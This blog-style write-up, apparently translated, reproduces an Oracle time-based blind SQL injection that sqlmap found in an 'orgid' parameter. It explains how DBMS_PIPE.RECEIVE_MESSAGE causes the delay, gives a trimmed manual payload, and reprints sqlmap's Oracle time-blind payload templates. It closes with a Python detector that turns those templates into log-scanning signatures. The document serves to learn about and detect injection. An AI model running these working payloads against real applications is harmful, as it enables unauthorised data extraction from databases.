Manually reproducing and verifying an Oracle time-based blind SQL injection reported by sqlmap


[Screenshot: the Oracle time-based blind injection as reported by sqlmap]

The payload was:

    abz345Name=************&orgid=400') AND 3587=DBMS_PIPE.RECEIVE_MESSAGE(CHR(78)||CHR(76)||CHR(74)||CHR(86),5) AND ('PrOw'='PrOw&abb017q=20220122&cxfw=1&abb017z=&bae204=0&pxfs=1&source=3&access_token=null&limit=12&_queryid=new

sqlmap reports the injection point as the orgid parameter, submitted via POST.

As this was my first encounter with Oracle time-based blind injection, I did not really understand the payload after orgid=400, so I searched Baidu and learned that Oracle time-based blind injection mainly relies on a handful of functions.

DBMS_PIPE.RECEIVE_MESSAGE is one of them (see "RECEIVE_MESSAGE function - get a message from the specified pipe" in the IBM documentation). The call blocks until a message arrives on the named pipe or the timeout passed as its second argument (in seconds) expires; since nothing ever writes to a pipe with a random name, the query stalls for the full timeout, and that stall is the delay the test looks for.

When testing manually, as soon as the page responds with the specified delay, the parameter can be judged vulnerable to time-based injection.

After repeated tests I trimmed the payload down to the minimum that still allows a judgment, to make debugging easier, and found it could also be submitted via GET, as follows:

    orgid=1') and 11=dbms_pipe.receive_message('RDS',5) and ('1'='1&cxfw=1&source=3&limit=12

[Screenshot: manual test]

I also consulted another expert and learned that time-based blind injection is a form of boolean injection: it is judged by true or false, and a delay of the specified length is enough to confirm the injection. To pull out the current user name or database name, you can only try one character at a time, 128 candidates per character; sqlmap does this by batch brute force, so it could also be done with Burp Suite.

The Oracle time-based blind payloads extracted from sqlmap (found under <sqlmap directory>\data\xml\payloads):

    <?xml version="1.0" encoding="UTF-8"?>
    
    <root>
        <!-- Time-based boolean tests -->
    
        <!-- Prefering "query SLEEP" over "SLEEP" because of JOIN-alike cases where SLEEPs get called multiple times (e.g. http://testphp.vulnweb.com/listproducts.php?cat=1) -->
        <test>
            <title>Oracle AND time-based blind</title>
            <stype>5</stype>
            <level>1</level>
            <risk>1</risk>
            <clause>1,2,3,9</clause>
            <where>1</where>
            <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
            <request>
                <payload>AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
            </request>
            <response>
                <time>[SLEEPTIME]</time>
            </response>
            <details>
                <dbms>Oracle</dbms>
            </details>
        </test>
    
        <test>
            <title>Oracle OR time-based blind</title>
            <stype>5</stype>
            <level>1</level>
            <risk>3</risk>
            <clause>1,2,3,9</clause>
            <where>1</where>
            <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
            <request>
                <payload>OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
            </request>
            <response>
                <time>[SLEEPTIME]</time>
            </response>
            <details>
                <dbms>Oracle</dbms>
            </details>
        </test>
    
        <test>
            <title>Oracle AND time-based blind (comment)</title>
            <stype>5</stype>
            <level>4</level>
            <risk>1</risk>
            <clause>1,2,3,9</clause>
            <where>1</where>
            <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
            <request>
                <payload>AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
                <comment>--</comment>
            </request>
            <response>
                <time>[SLEEPTIME]</time>
            </response>
            <details>
                <dbms>Oracle</dbms>
            </details>
        </test>
    
        <test>
            <title>Oracle OR time-based blind (comment)</title>
            <stype>5</stype>
            <level>4</level>
            <risk>3</risk>
            <clause>1,2,3,9</clause>
            <where>1</where>
            <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
            <request>
                <payload>OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
                <comment>--</comment>
            </request>
            <response>
                <time>[SLEEPTIME]</time>
            </response>
            <details>
                <dbms>Oracle</dbms>
            </details>
        </test>
    
        <test>
            <title>Oracle AND time-based blind (heavy query)</title>
            <stype>5</stype>
            <level>2</level>
            <risk>2</risk>
            <clause>1,2,3,9</clause>
            <where>1</where>
            <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
            <request>
                <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
            </request>
            <response>
                <time>[DELAYED]</time>
            </response>
            <details>
                <dbms>Oracle</dbms>
            </details>
        </test>
    
        <test>
            <title>Oracle OR time-based blind (heavy query)</title>
            <stype>5</stype>
            <level>2</level>
            <risk>3</risk>
            <clause>1,2,3,9</clause>
            <where>1</where>
            <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
            <request>
                <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
            </request>
            <response>
                <time>[DELAYED]</time>
            </response>
            <details>
                <dbms>Oracle</dbms>
            </details>
        </test>
    
        <test>
            <title>Oracle AND time-based blind (heavy query - comment)</title>
            <stype>5</stype>
            <level>5</level>
            <risk>2</risk>
            <clause>1,2,3,9</clause>
            <where>1</where>
            <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
            <request>
                <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
                <comment>--</comment>
            </request>
            <response>
                <time>[DELAYED]</time>
            </response>
            <details>
                <dbms>Oracle</dbms>
            </details>
        </test>
    
        <test>
            <title>Oracle OR time-based blind (heavy query - comment)</title>
            <stype>5</stype>
            <level>5</level>
            <risk>3</risk>
            <clause>1,2,3,9</clause>
            <where>1</where>
            <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
            <request>
                <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
                <comment>--</comment>
            </request>
            <response>
                <time>[DELAYED]</time>
            </response>
            <details>
                <dbms>Oracle</dbms>
            </details>
        </test>
    
        <!-- Without parentesis because it never works with them, useful to exploit SQL injection in Oracle E-Business Suite Financials -->
        <test>
            <title>Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)</title>
            <stype>5</stype>
            <level>3</level>
            <risk>1</risk>
            <clause>1,3,9</clause>
            <where>3</where>
            <vector>BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector>
            <request>
                <payload>BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</payload>
            </request>
            <response>
                <time>[SLEEPTIME]</time>
            </response>
            <details>
                <dbms>Oracle</dbms>
            </details>
        </test>
    
        <test>
            <title>Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)</title>
            <stype>5</stype>
            <level>3</level>
            <risk>1</risk>
            <clause>1,3,9</clause>
            <where>3</where>
            <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</vector>
            <request>
                <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</payload>
            </request>
            <response>
                <time>[SLEEPTIME]</time>
            </response>
            <details>
                <dbms>Oracle</dbms>
            </details>
        </test>
    
        <test>
            <title>Oracle time-based blind - Parameter replace (heavy queries)</title>
            <stype>5</stype>
            <level>4</level>
            <risk>2</risk>
            <clause>1,3,9</clause>
            <where>3</where>
            <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</vector>
            <request>
                <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</payload>
            </request>
            <response>
                <time>[DELAYED]</time>
            </response>
            <details>
                <dbms>Oracle</dbms>
            </details>
        </test>
    
    
        <test>
            <title>Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)</title>
            <stype>5</stype>
            <level>3</level>
            <risk>1</risk>
            <clause>2,3</clause>
            <where>1</where>
            <vector>,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</vector>
            <request>
                <payload>,(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</payload>
            </request>
            <response>
                <time>[SLEEPTIME]</time>
            </response>
            <details>
                <dbms>Oracle</dbms>
            </details>
        </test>
    
        <test>
            <title>Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)</title>
            <stype>5</stype>
            <level>3</level>
            <risk>1</risk>
            <clause>2,3</clause>
            <where>1</where>
            <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
            <request>
                <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
            </request>
            <response>
                <time>[SLEEPTIME]</time>
            </response>
            <details>
                <dbms>Oracle</dbms>
            </details>
        </test>
    
        <test>
            <title>Oracle time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>
            <stype>5</stype>
            <level>4</level>
            <risk>2</risk>
            <clause>2,3</clause>
            <where>1</where>
            <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
            <request>
                <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
            </request>
            <response>
                <time>[DELAYED]</time>
            </response>
            <details>
                <dbms>Oracle</dbms>
            </details>
        </test>
        <!-- End of time-based boolean tests - ORDER BY, GROUP BY clause -->
    </root>
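The block below is an added example, not code from this write-up or from sqlmap: it turns sqlmap's own payload catalogue into detection signatures by parsing a constructed excerpt of the XML above, expanding the [RANDNUM], [RANDSTR] and [SLEEPTIME] placeholders into regexes, and undoing the CHR() encoding that hid the pipe name 'NLJV' in the scanner's first payload, so that both requests quoted in this write-up are recognised in request logs.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import unquote_plus

# Constructed excerpt of sqlmap's Oracle time-based templates (same shape as the XML above).
PAYLOAD_XML = """<root>
<test><title>Oracle AND time-based blind</title><request>
<payload>AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload></request></test>
<test><title>Oracle AND time-based blind (heavy query)</title><request>
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload></request></test>
<test><title>Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)</title><request>
<payload>BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</payload></request></test>
</root>"""

# What each sqlmap placeholder can expand to in a live request.
PLACEHOLDERS = {"RANDNUM": r"\d+", "RANDSTR": r"\w+", "SLEEPTIME": r"\d+", "INFERENCE": r".+?"}

def template_to_regex(template):
    """Turn one <payload>/<vector> template into a case-insensitive, whitespace-tolerant regex."""
    pattern = re.escape(template)
    for name, sub in PLACEHOLDERS.items():
        pattern = pattern.replace(re.escape(f"[{name}]"), sub)
    pattern = pattern.replace("=", r"\s*=\s*")   # 'and 11 = dbms_pipe...' still matches
    pattern = pattern.replace("\\ ", r"\s*")     # re.escape escapes spaces; allow any spacing
    return re.compile(pattern, re.IGNORECASE)

def load_signatures(xml_text):
    """One (title, regex) pair per detection payload and per inference vector in the catalogue."""
    sigs = []
    for test in ET.fromstring(xml_text).iter("test"):
        for path in ("request/payload", "vector"):
            if test.findtext(path):
                sigs.append((test.findtext("title"), template_to_regex(test.findtext(path))))
    return sigs

CHR_RUN = re.compile(r"CHR\(\d+\)(?:\s*\|\|\s*CHR\(\d+\))*", re.IGNORECASE)

def normalize(raw):
    """URL-decode, then fold CHR(78)||CHR(76)||... back into the quoted literal ('NLJV') the template uses."""
    codes = lambda m: "".join(chr(int(c)) for c in re.findall(r"\d+", m.group(0)))
    return CHR_RUN.sub(lambda m: "'" + codes(m) + "'", unquote_plus(raw))

SIGNATURES = load_signatures(PAYLOAD_XML)

def scan(request, sigs=SIGNATURES):
    """Titles of the sqlmap templates the request matches; empty list when no time-based probe is present."""
    text = normalize(request)
    return list(dict.fromkeys(title for title, rx in sigs if rx.search(text)))

# Constructed samples: the two payloads quoted in the write-up (CHR()-encoded and trimmed) and a benign request.
SAMPLES = [
    "orgid=400') AND 3587=DBMS_PIPE.RECEIVE_MESSAGE(CHR(78)||CHR(76)||CHR(74)||CHR(86),5) AND ('PrOw'='PrOw&cxfw=1",
    "orgid=1') and 11=dbms_pipe.receive_message('RDS',5) and ('1'='1&cxfw=1&source=3&limit=12",
    "orgid=400&cxfw=1&source=3&limit=12",
]
```

load_signatures can be pointed at the full time_blind.xml from that sqlmap directory; any placeholder beyond the four mapped here (such as numbered variants) has to be added to PLACEHOLDERS first, or its template will never match.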

References:

DBMS_PIPE
Summary of Oracle delay-based blind injection - 卿先生 - 博客园
Oracle time-based injection - CSDN
Notes on manual Oracle blind injection - 百度文库
Time-based blind injection - heibaikong6's blog - CSDN
hacking-oracle
Customizing payloads by reading the sqlmap source - 安全客
Tools | The road to modifying sqlmap payloads (part 2) - FreeBuf
From an error-based injection to a custom sqlmap payload: the whole process
Generic SQL injection vulnerability in the 北大方正翔宇 CMS | CN-SEC 中文网

Original article: https://www.cnblogs.com/jasy/p/16133521.html